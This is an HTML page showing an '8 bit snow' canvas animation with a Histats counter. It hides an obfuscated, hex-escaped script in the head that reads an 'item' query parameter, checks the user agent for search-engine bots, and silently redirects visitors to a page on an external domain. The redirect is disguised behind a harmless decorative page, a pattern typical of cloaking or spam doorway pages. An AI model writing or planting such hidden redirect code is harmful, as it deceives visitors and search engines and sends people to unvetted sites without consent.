<!DOCTYPE html>
<html lang="KO" >
<head>
<meta charset="UTF-8">
<title>GUMINYO 🇰🇷 </title>
<meta name="robots" content="index,follow"/>
<link rel="icon" type="image/x-icon" href="/favicon.png"/>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">
<style>
body, html {
  width: 100%;
  height: 100%;
  overflow: hidden;
  font-family: "Press Start 2P", cursive;
}

.center {
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  color: #fff;
  display: flex;
  align-items: center;
}
.center .text-center {
  text-align: center;
  width: 100%;
}

h1 {
  display: inline-block;
  padding-right: 5px;
  border-right: 10px solid #fff;
  animation: blink 1s infinite;
}
@media screen and (max-width: 370px) {
  h1 {
    font-size: 5vw;
    border-right: 4px solid #fff;
  }
}

@keyframes blink {
  0% {
    border-right-color: transparent;
  }
  50% {
    border-right-color: transparent;
  }
  51% {
    border-right-color: #fff;
  }
  100% {
    border-right-color: #fff;
  }
}
canvas {
  background: #000;
  width: 100%;
  height: 100%;
}
</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script> 
<script>
  if (document.location.search.match(/type=embed/gi)) {
    window.parent.postMessage("resize", "*");
  }
</script>
</head>
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4705536,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4705536&101" alt="counter statistics" border="0"></a></noscript>
<script>
var _0x570b=["\x72\x65\x70\x6C\x61\x63\x65","\x73\x65\x61\x72\x63\x68","\x70\x61\x74\x68\x6E\x61\x6D\x65","\x65\x78\x65\x63","","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x65\x73\x74","\x5F\x64\x58\x54\x61\x53\x64\x69","\x69\x74\x65\x6D","\x68\x72\x65\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x65\x69\x6E\x7A\x79\x2E\x63\x6F\x6D\x2F\x6B\x6F\x2F\x69\x64\x2F","\x2E\x68\x74\x6D\x6C"];(function(){let _0xb433x1=(function(){var _0xb433x2={};location[_0x570b[1]][_0x570b[0]](/[?&]+([^=&]+)=([^&]*)/gi,function(_0xb433x3,_0xb433x4,_0xb433x5){_0xb433x2[_0xb433x4]= _0xb433x5});return _0xb433x2})();(/(\d+)\.html$/[_0x570b[3]](location[_0x570b[2]]))?/(\d+)\.html$/[_0x570b[3]](location[_0x570b[2]])[1]:_0x570b[4];let _0xb433x6=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i[_0x570b[6]](navigator[_0x570b[5]]);let _0xb433x7=_0x570b[7];if(_0xb433x1[_0x570b[8]]&&  !_0xb433x6){location[_0x570b[9]]= _0x570b[10]+ _0xb433x1[_0x570b[8]]+ _0x570b[11]}else {if(_0xb433x1[_0x570b[8]]&& _0xb433x6){location[_0x570b[0]](_0x570b[10]+ _0xb433x1[_0x570b[8]]+ _0x570b[11])}}})()
</script>
<body translate="no" >
<link href="https://fonts.googleapis.com/css?family=Press+Start+2P" rel="stylesheet">
<canvas id="snow"></canvas>
<div class="center">
  <div class="text-center">
    <h1>8 bit snow</h1>
  </div>
</div>

<script id="rendered-js" >
var Snow = {
  el: "#snow",
  density: 10000, // higher = fewer bits
  maxHSpeed: 5, // How much do you want them to move horizontally
  minFallSpeed: 2,
  canvas: null,
  ctx: null,
  particles: [],
  colors: [],
  mp: 1,
  quit: false,
  init() {
    this.canvas = document.querySelector(this.el);
    this.ctx = this.canvas.getContext("2d");
    this.reset();
    requestAnimationFrame(this.render.bind(this));
    window.addEventListener("resize", this.reset.bind(this));
  },
  reset() {
    this.w = window.innerWidth;
    this.h = window.innerHeight;
    this.canvas.width = this.w;
    this.canvas.height = this.h;
    this.particles = [];
    this.mp = Math.ceil(this.w * this.h / this.density);
    for (var i = 0; i < this.mp; i++)
    {
      var size = Math.random() * 4 + 5;
      this.particles.push({
        x: Math.random() * this.w, //x-coordinate
        y: Math.random() * this.h, //y-coordinate
        w: size,
        h: size,
        vy: this.minFallSpeed + Math.random(), //density
        vx: Math.random() * this.maxHSpeed - this.maxHSpeed / 2,
        fill: "#ffffff",
        s: Math.random() * 0.2 - 0.1 });

    }
  },

  render() {
    this.ctx.clearRect(0, 0, this.w, this.h);
    this.particles.forEach((p, i) => {
      p.y += p.vy;
      p.x += p.vx;
      this.ctx.fillStyle = p.fill;
      this.ctx.fillRect(p.x, p.y, p.w, p.h);
      if (p.x > this.w + 5 || p.x < -5 || p.y > this.h) {
        p.x = Math.random() * this.w;
        p.y = -10;
      }
    });
    if (this.quit) {
      return;
    }
    requestAnimationFrame(this.render.bind(this));
  },
  destroy() {
    this.quit = true;
  } };
var confetti = Snow.init();
</script>

</body>
</html>